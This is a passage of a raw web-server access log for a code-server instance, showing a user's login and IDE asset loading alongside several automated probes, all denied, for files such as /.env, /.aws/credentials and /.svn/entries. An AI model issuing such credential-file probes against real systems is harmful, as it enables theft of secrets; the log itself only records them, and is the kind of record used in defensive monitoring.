Chrome/91.0.4472.124 Safari/537.36" "-" +[21/Jan/2026:21:39:01 +0000] - 401 401 - GET http code.profibot.hu "/.svn/wc.db" [Client 45.148.10.99] [Length 24] [Gzip -] [Sent-to code-server] "Mozilla/5.0" "-" +[21/Jan/2026:21:39:02 +0000] - 401 401 - GET http code.profibot.hu "/.svn/entries" [Client 45.148.10.99] [Length 24] [Gzip -] [Sent-to code-server] "Mozilla/5.0" "-" +[21/Jan/2026:21:39:06 +0000] - 302 302 - GET https code.profibot.hu "/" [Client 45.148.10.99] [Length 29] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36" "-" +[21/Jan/2026:21:39:07 +0000] - 200 200 - GET https code.profibot.hu "/login" [Client 45.148.10.99] [Length 2621] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36" "-" +[21/Jan/2026:21:39:11 +0000] - 200 200 - GET https code.profibot.hu "/manifest.json" [Client 45.148.10.99] [Length 870] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36" "-" +[21/Jan/2026:23:39:34 +0000] - 302 302 - GET https code.profibot.hu "/" [Client 84.254.106.197] [Length 36] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Linux; Android 6.0; Nexus 5 Build/MRA58N) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Mobile Safari/537.36" "-" +[21/Jan/2026:23:39:34 +0000] - 200 200 - GET https code.profibot.hu "/login" [Client 84.254.106.197] [Length 1038] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Linux; Android 6.0; Nexus 5 Build/MRA58N) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Mobile Safari/537.36" "https://code.profibot.hu/" +[21/Jan/2026:23:39:34 +0000] - 401 401 - GET https code.profibot.hu "/js/twint_ch.js" [Client 84.254.106.197] [Length 659] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Linux; Android 6.0; Nexus 5 Build/MRA58N) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Mobile Safari/537.36" "-" +[21/Jan/2026:23:39:35 +0000] - 200 200 - GET https code.profibot.hu "/_static/src/browser/media/favicon-dark-support.svg" [Client 84.254.106.197] [Length 685] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Linux; Android 6.0; Nexus 5 Build/MRA58N) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Mobile Safari/537.36" "-" +[21/Jan/2026:23:39:35 +0000] - 401 401 - GET https code.profibot.hu "/js/lkk_ch.js" [Client 84.254.106.197] [Length 659] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Linux; Android 6.0; Nexus 5 Build/MRA58N) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Mobile Safari/537.36" "-" +[21/Jan/2026:23:39:35 +0000] - 200 200 - GET https code.profibot.hu "/_static/src/browser/media/pwa-icon-512.png" [Client 84.254.106.197] [Length 8489] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Linux; Android 6.0; Nexus 5 Build/MRA58N) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Mobile Safari/537.36" "-" +[21/Jan/2026:23:39:35 +0000] - 200 200 - GET https code.profibot.hu "/_static/src/browser/pages/global.css" [Client 84.254.106.197] [Length 804] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Linux; Android 6.0; Nexus 5 Build/MRA58N) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Mobile Safari/537.36" "-" +[21/Jan/2026:23:39:35 +0000] - 200 200 - GET https code.profibot.hu "/_static/src/browser/pages/login.css" [Client 84.254.106.197] [Length 464] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Linux; Android 6.0; Nexus 5 Build/MRA58N) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Mobile Safari/537.36" "-" +[21/Jan/2026:23:39:35 +0000] - 200 200 - GET https code.profibot.hu "/_static/src/browser/media/favicon.ico" [Client 84.254.106.197] [Length 4231] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Linux; Android 6.0; Nexus 5 Build/MRA58N) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Mobile Safari/537.36" "-" +[21/Jan/2026:23:39:35 +0000] - 200 200 - GET https code.profibot.hu "/_static/src/browser/media/pwa-icon-192.png" [Client 84.254.106.197] [Length 3276] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Linux; Android 6.0; Nexus 5 Build/MRA58N) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Mobile Safari/537.36" "-" +[21/Jan/2026:23:39:35 +0000] - 200 200 - GET https code.profibot.hu "/manifest.json" [Client 84.254.106.197] [Length 296] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Linux; Android 6.0; Nexus 5 Build/MRA58N) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Mobile Safari/537.36" "-" +[21/Jan/2026:23:39:35 +0000] - 401 401 - GET https code.profibot.hu "/css/support_parent.css" [Client 84.254.106.197] [Length 659] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Linux; Android 6.0; Nexus 5 Build/MRA58N) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Mobile Safari/537.36" "-" +[22/Jan/2026:02:06:38 +0000] - 302 302 - GET https code.profibot.hu "/" [Client 23.27.145.57] [Length 36] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (X11; Linux i686; rv:109.0) Gecko/20100101 Firefox/120.0" "-" +[22/Jan/2026:02:06:38 +0000] - 200 200 - GET https code.profibot.hu "/login" [Client 23.27.145.57] [Length 1038] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (X11; Linux i686; rv:109.0) Gecko/20100101 Firefox/120.0" "-" +[22/Jan/2026:02:52:24 +0000] - 302 302 - GET http code.profibot.hu "/" [Client 45.148.10.154] [Length 29] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36" "-" +[22/Jan/2026:02:52:25 +0000] - 200 200 - GET http code.profibot.hu "/login" [Client 45.148.10.154] [Length 2621] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36" "-" +[22/Jan/2026:02:53:00 +0000] - 401 401 - GET http code.profibot.hu "/.svn/entries" [Client 45.148.10.154] [Length 24] [Gzip -] [Sent-to code-server] "Mozilla/5.0" "-" +[22/Jan/2026:02:53:01 +0000] - 302 302 - GET http code.profibot.hu "/" [Client 45.148.10.154] [Length 29] [Gzip -] [Sent-to code-server] "-" "-" +[22/Jan/2026:02:53:01 +0000] - 302 302 - GET http code.profibot.hu "/" [Client 45.148.10.154] [Length 29] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36" "-" +[22/Jan/2026:02:53:04 +0000] - 200 200 - GET http code.profibot.hu "/login" [Client 45.148.10.154] [Length 2621] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36" "-" +[22/Jan/2026:02:53:05 +0000] - 200 200 - GET http code.profibot.hu "/manifest.json" [Client 45.148.10.154] [Length 870] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36" "-" +[22/Jan/2026:05:13:52 +0000] - 302 302 - GET https code.profibot.hu "/" [Client 23.27.145.119] [Length 36] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (X11; Linux i686; rv:109.0) Gecko/20100101 Firefox/120.0" "-" +[22/Jan/2026:05:13:52 +0000] - 200 200 - GET https code.profibot.hu "/login" [Client 23.27.145.119] [Length 1038] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (X11; Linux i686; rv:109.0) Gecko/20100101 Firefox/120.0" "-" +[22/Jan/2026:08:19:04 +0000] - 401 401 - GET https code.profibot.hu "/.env" [Client 45.148.10.238] [Length 24] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Windows; U; Windows NT 6.2; es-US ) AppleWebKit/540.0 (KHTML like Gecko) Version/6.0 Safari/8900.00" "-" +[22/Jan/2026:08:19:04 +0000] - 401 401 - GET https code.profibot.hu "/aws.env" [Client 45.148.10.238] [Length 24] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.4; en; rv:1.9.2.28) Gecko/20120308 Camino/2.1.2 (like Firefox/3.6.28)" "-" +[22/Jan/2026:08:19:04 +0000] - 401 401 - GET https code.profibot.hu "/.aws/credentials" [Client 45.148.10.238] [Length 24] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.100 Safari/537.36" "-" +[22/Jan/2026:10:50:49 +0000] - 302 302 - GET https code.profibot.hu "/" [Client 84.1.26.27] [Length 36] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "-" +[22/Jan/2026:10:50:49 +0000] - 200 200 - GET https code.profibot.hu "/login" [Client 84.1.26.27] [Length 934] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "-" +[22/Jan/2026:10:50:49 +0000] - 304 304 - GET https code.profibot.hu "/_static/src/browser/pages/global.css" [Client 84.1.26.27] [Length 0] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://code.profibot.hu/login" +[22/Jan/2026:10:50:49 +0000] - 304 304 - GET https code.profibot.hu "/_static/src/browser/pages/login.css" [Client 84.1.26.27] [Length 0] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://code.profibot.hu/login" +[22/Jan/2026:10:50:49 +0000] - 200 200 - GET https code.profibot.hu "/manifest.json" [Client 84.1.26.27] [Length 291] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://code.profibot.hu/login" +[22/Jan/2026:10:50:49 +0000] - 304 304 - GET https code.profibot.hu "/_static/src/browser/media/favicon.ico" [Client 84.1.26.27] [Length 0] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://code.profibot.hu/login" +[22/Jan/2026:10:50:49 +0000] - 304 304 - GET https code.profibot.hu "/_static/src/browser/media/pwa-icon-192.png" [Client 84.1.26.27] [Length 0] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://code.profibot.hu/login" +[22/Jan/2026:10:50:50 +0000] - 304 304 - GET https code.profibot.hu "/_static/out/browser/serviceWorker.js" [Client 84.1.26.27] [Length 0] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://code.profibot.hu/_static/out/browser/serviceWorker.js" +[22/Jan/2026:10:53:39 +0000] - 302 302 - GET https code.profibot.hu "/" [Client 84.1.26.27] [Length 36] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "-" +[22/Jan/2026:10:53:39 +0000] - 304 304 - GET https code.profibot.hu "/login" [Client 84.1.26.27] [Length 0] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "-" +[22/Jan/2026:10:53:39 +0000] - 304 304 - GET https code.profibot.hu "/_static/src/browser/pages/global.css" [Client 84.1.26.27] [Length 0] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://code.profibot.hu/login" +[22/Jan/2026:10:53:39 +0000] - 304 304 - GET https code.profibot.hu "/_static/src/browser/pages/login.css" [Client 84.1.26.27] [Length 0] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://code.profibot.hu/login" +[22/Jan/2026:10:53:39 +0000] - 200 200 - GET https code.profibot.hu "/manifest.json" [Client 84.1.26.27] [Length 291] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://code.profibot.hu/login" +[22/Jan/2026:10:53:39 +0000] - 304 304 - GET https code.profibot.hu "/_static/src/browser/media/favicon.ico" [Client 84.1.26.27] [Length 0] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://code.profibot.hu/login" +[22/Jan/2026:10:53:39 +0000] - 304 304 - GET https code.profibot.hu "/_static/src/browser/media/pwa-icon-192.png" [Client 84.1.26.27] [Length 0] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://code.profibot.hu/login" +[22/Jan/2026:10:53:40 +0000] - 304 304 - GET https code.profibot.hu "/_static/out/browser/serviceWorker.js" [Client 84.1.26.27] [Length 0] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://code.profibot.hu/_static/out/browser/serviceWorker.js" +[22/Jan/2026:10:53:41 +0000] - 302 302 - POST https code.profibot.hu "/login" [Client 84.1.26.27] [Length 31] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://code.profibot.hu/login" +[22/Jan/2026:10:53:41 +0000] - 302 302 - GET https code.profibot.hu "/" [Client 84.1.26.27] [Length 58] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://code.profibot.hu/login" +[22/Jan/2026:10:53:41 +0000] - 200 200 - GET https code.profibot.hu "/?folder=/home/coder/project" [Client 84.1.26.27] [Length 1380] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://code.profibot.hu/login" +[22/Jan/2026:10:53:42 +0000] - 200 200 - GET https code.profibot.hu "/manifest.json" [Client 84.1.26.27] [Length 291] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://code.profibot.hu/?folder=/home/coder/project" +[22/Jan/2026:10:53:42 +0000] - 304 304 - GET https code.profibot.hu "/_static/src/browser/media/favicon.ico" [Client 84.1.26.27] [Length 0] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://code.profibot.hu/?folder=/home/coder/project" +[22/Jan/2026:10:53:42 +0000] - 304 304 - GET https code.profibot.hu "/_static/src/browser/media/pwa-icon-192.png" [Client 84.1.26.27] [Length 0] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://code.profibot.hu/?folder=/home/coder/project" +[22/Jan/2026:10:53:42 +0000] - 404 404 - GET https code.profibot.hu "/stable-ba588b47099b31ad9734ef05534e9813bae22c64/static/node_modules/vsda/rust/web/vsda.js" [Client 84.1.26.27] [Length 23] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://code.profibot.hu/?folder=/home/coder/project" +[22/Jan/2026:10:53:42 +0000] - 404 404 - GET https code.profibot.hu "/stable-ba588b47099b31ad9734ef05534e9813bae22c64/static/node_modules/vsda/rust/web/vsda_bg.wasm" [Client 84.1.26.27] [Length 23] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://code.profibot.hu/?folder=/home/coder/project" +[22/Jan/2026:10:53:43 +0000] - 304 304 - GET https code.profibot.hu "/update/check" [Client 84.1.26.27] [Length 0] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://code.profibot.hu/?folder=/home/coder/project" +[22/Jan/2026:10:53:43 +0000] - 200 200 - GET https code.profibot.hu "/stable-ba588b47099b31ad9734ef05534e9813bae22c64/static/out/vs/workbench/services/extensions/worker/webWorkerExtensionHostIframe.html?&vscodeWebWorkerExtHostId=44843dce-eb07-4c62-8be0-64bf75630745" [Client 84.1.26.27] [Length 2196] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://code.profibot.hu/?folder=/home/coder/project" +[22/Jan/2026:10:53:45 +0000] - 304 304 - GET https code.profibot.hu "/_static/out/browser/serviceWorker.js" [Client 84.1.26.27] [Length 0] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://code.profibot.hu/_static/out/browser/serviceWorker.js" +[22/Jan/2026:11:17:40 +0000] - 200 200 - GET https code.profibot.hu "/stable-ba588b47099b31ad9734ef05534e9813bae22c64/vscode-remote-resource?path=%2Fapp%2Fcode-server%2Flib%2Fvscode%2Fextensions%2Fyaml%2Flanguage-configuration.json&tkn=" [Client 84.1.26.27] [Length 250] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://code.profibot.hu/?folder=/home/coder/project" +[22/Jan/2026:11:17:40 +0000] - 200 200 - GET https code.profibot.hu "/stable-ba588b47099b31ad9734ef05534e9813bae22c64/vscode-remote-resource?path=%2Fapp%2Fcode-server%2Flib%2Fvscode%2Fextensions%2Fyaml%2Fsyntaxes%2Fyaml.tmLanguage.json&tkn=" [Client 84.1.26.27] [Length 1158] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://code.profibot.hu/?folder=/home/coder/project" +[22/Jan/2026:11:17:40 +0000] - 200 200 - GET https code.profibot.hu "/stable-ba588b47099b31ad9734ef05534e9813bae22c64/vscode-remote-resource?path=%2Fapp%2Fcode-server%2Flib%2Fvscode%2Fextensions%2Fyaml%2Fsyntaxes%2Fyaml-embedded.tmLanguage.json&tkn=" [Client 84.1.26.27] [Length 2380] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://code.profibot.hu/?folder=/home/coder/project" +[22/Jan/2026:11:17:40 +0000] - 200 200 - GET https code.profibot.hu "/stable-ba588b47099b31ad9734ef05534e9813bae22c64/vscode-remote-resource?path=%2Fapp%2Fcode-server%2Flib%2Fvscode%2Fextensions%2Fyaml%2Fsyntaxes%2Fyaml-1.2.tmLanguage.json&tkn=" [Client 84.1.26.27] [Length 5082] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://code.profibot.hu/?folder=/home/coder/project" +[22/Jan/2026:11:17:40 +0000] - 200 200 - GET https code.profibot.hu "/stable-ba588b47099b31ad9734ef05534e9813bae22c64/vscode-remote-resource?path=%2Fapp%2Fcode-server%2Flib%2Fvscode%2Fextensions%2Fyaml%2Fsyntaxes%2Fyaml-1.1.tmLanguage.json&tkn=" [Client 84.1.26.27] [Length 4996] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://code.profibot.hu/?folder=/home/coder/project" +[22/Jan/2026:11:17:40 +0000] - 200 200 - GET https code.profibot.hu "/stable-ba588b47099b31ad9734ef05534e9813bae22c64/vscode-remote-resource?path=%2Fapp%2Fcode-server%2Flib%2Fvscode%2Fextensions%2Fyaml%2Fsyntaxes%2Fyaml-1.3.tmLanguage.json&tkn=" [Client 84.1.26.27] [Length 675] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://code.profibot.hu/?folder=/home/coder/project" +[22/Jan/2026:11:17:40 +0000] - 200 200 - GET https code.profibot.hu "/stable-ba588b47099b31ad9734ef05534e9813bae22c64/vscode-remote-resource?path=%2Fapp%2Fcode-server%2Flib%2Fvscode%2Fextensions%2Fyaml%2Fsyntaxes%2Fyaml-1.0.tmLanguage.json&tkn=" [Client 84.1.26.27] [Length 3758] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://code.profibot.hu/?folder=/home/coder/project" +[22/Jan/2026:11:17:58 +0000] - 200 200 - GET https code.profibot.hu "/stable-ba588b47099b31ad9734ef05534e9813bae22c64/vscode-remote-resource?path=%2Fapp%2Fcode-server%2Flib%2Fvscode%2Fextensions%2Fbat%2Fsnippets%2Fbatchfile.code-snippets&tkn=" [Client 84.1.26.27] [Length 114] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://code.profibot.hu/?folder=/home/coder/project" +[22/Jan/2026:11:17:58 +0000] - 200 200 - GET https code.profibot.hu "/stable-ba588b47099b31ad9734ef05534e9813bae22c64/vscode-remote-resource?path=%2Fapp%2Fcode-server%2Flib%2Fvscode%2Fextensions%2Fcoffeescript%2Fsnippets%2Fcoffeescript.code-snippets&tkn=" [Client 84.1.26.27] [Length 113] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://code.profibot.hu/?folder=/home/coder/project" +[22/Jan/2026:11:17:58 +0000] - 200 200 - GET https code.profibot.hu "/stable-ba588b47099b31ad9734ef05534e9813bae22c64/vscode-remote-resource?path=%2Fapp%2Fcode-server%2Flib%2Fvscode%2Fextensions%2Fcpp%2Fsnippets%2Fc.code-snippets&tkn=" [Client 84.1.26.27] [Length 120] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://code.profibot.hu/?folder=/home/coder/project" +[22/Jan/2026:11:17:58 +0000] - 200 200 - GET https code.profibot.hu "/stable-ba588b47099b31ad9734ef05534e9813bae22c64/vscode-remote-resource?path=%2Fapp%2Fcode-server%2Flib%2Fvscode%2Fextensions%2Fcpp%2Fsnippets%2Fcpp.code-snippets&tkn=" [Client 84.1.26.27] [Length 120] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://code.profibot.hu/?folder=/home/coder/project" +[22/Jan/2026:11:17:58 +0000] - 200 200 - GET https code.profibot.hu "/stable-ba588b47099b31ad9734ef05534e9813bae22c64/vscode-remote-resource?path=%2Fapp%2Fcode-server%2Flib%2Fvscode%2Fextensions%2Fhtml%2Fsnippets%2Fhtml.code-snippets&tkn=" [Client 84.1.26.27] [Length 166] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://code.profibot.hu/?folder=/home/coder/project" +[22/Jan/2026:11:17:58 +0000] - 200 200 - GET https code.profibot.hu "/stable-ba588b47099b31ad9734ef05534e9813bae22c64/vscode-remote-resource?path=%2Fapp%2Fcode-server%2Flib%2Fvscode%2Fextensions%2Fcsharp%2Fsnippets%2Fcsharp.code-snippets&tkn=" [Client 84.1.26.27] [Length 114] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://code.profibot.hu/?folder=/home/coder/project" +[22/Jan/2026:11:17:58 +0000] - 200 200 - GET https code.profibot.hu "/stable-ba588b47099b31ad9734ef05534e9813bae22c64/vscode-remote-resource?path=%2Fapp%2Fcode-server%2Flib%2Fvscode%2Fextensions%2Ffsharp%2Fsnippets%2Ffsharp.code-snippets&tkn=" [Client 84.1.26.27] [Length 116] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://code.profibot.hu/?folder=/home/coder/project" +[22/Jan/2026:11:17:58 +0000] - 200 200 - GET https code.profibot.hu "/stable-ba588b47099b31ad9734ef05534e9813bae22c64/vscode-remote-resource?path=%2Fapp%2Fcode-server%2Flib%2Fvscode%2Fextensions%2Fgroovy%2Fsnippets%2Fgroovy.code-snippets&tkn=" [Client 84.1.26.27] [Length 1138] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://code.profibot.hu/?folder=/home/coder/project" +[22/Jan/2026:11:17:58 +0000] - 200 200 - GET https code.profibot.hu "/stable-ba588b47099b31ad9734ef05534e9813bae22c64/vscode-remote-resource?path=%2Fapp%2Fcode-server%2Flib%2Fvscode%2Fextensions%2Fjava%2Fsnippets%2Fjava.code-snippets&tkn=" [Client 84.1.26.27] [Length 114] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://code.profibot.hu/?folder=/home/coder/project" +[22/Jan/2026:11:17:58 +0000] - 200 200 - GET https code.profibot.hu "/stable-ba588b47099b31ad9734ef05534e9813bae22c64/vscode-remote-resource?path=%2Fapp%2Fcode-server%2Flib%2Fvscode%2Fextensions%2Fjavascript%2Fsnippets%2Fjavascript.code-snippets&tkn=" [Client 84.1.26.27] [Length 1095] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://code.profibot.hu/?folder=/home/coder/project" +[22/Jan/2026:11:17:58 +0000] - 200 200 - GET https code.profibot.hu "/stable-ba588b47099b31ad9734ef05534e9813bae22c64/vscode-remote-resource?path=%2Fapp%2Fcode-server%2Flib%2Fvscode%2Fextensions%2Fmarkdown-basics%2Fsnippets%2Fmarkdown.code-snippets&tkn=" [Client 84.1.26.27] [Length 585] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://code.profibot.hu/?folder=/home/coder/project" +[22/Jan/2026:11:17:58 +0000] - 200 200 - GET https code.profibot.hu 